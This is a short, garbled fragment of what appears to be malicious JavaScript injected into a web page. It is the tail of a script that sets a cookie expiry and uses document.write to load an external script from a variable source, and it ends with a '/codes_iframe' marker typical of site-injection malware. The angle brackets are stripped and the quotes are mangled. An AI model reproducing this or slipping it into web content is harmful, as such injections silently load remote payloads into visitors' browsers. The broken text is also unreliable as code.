expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–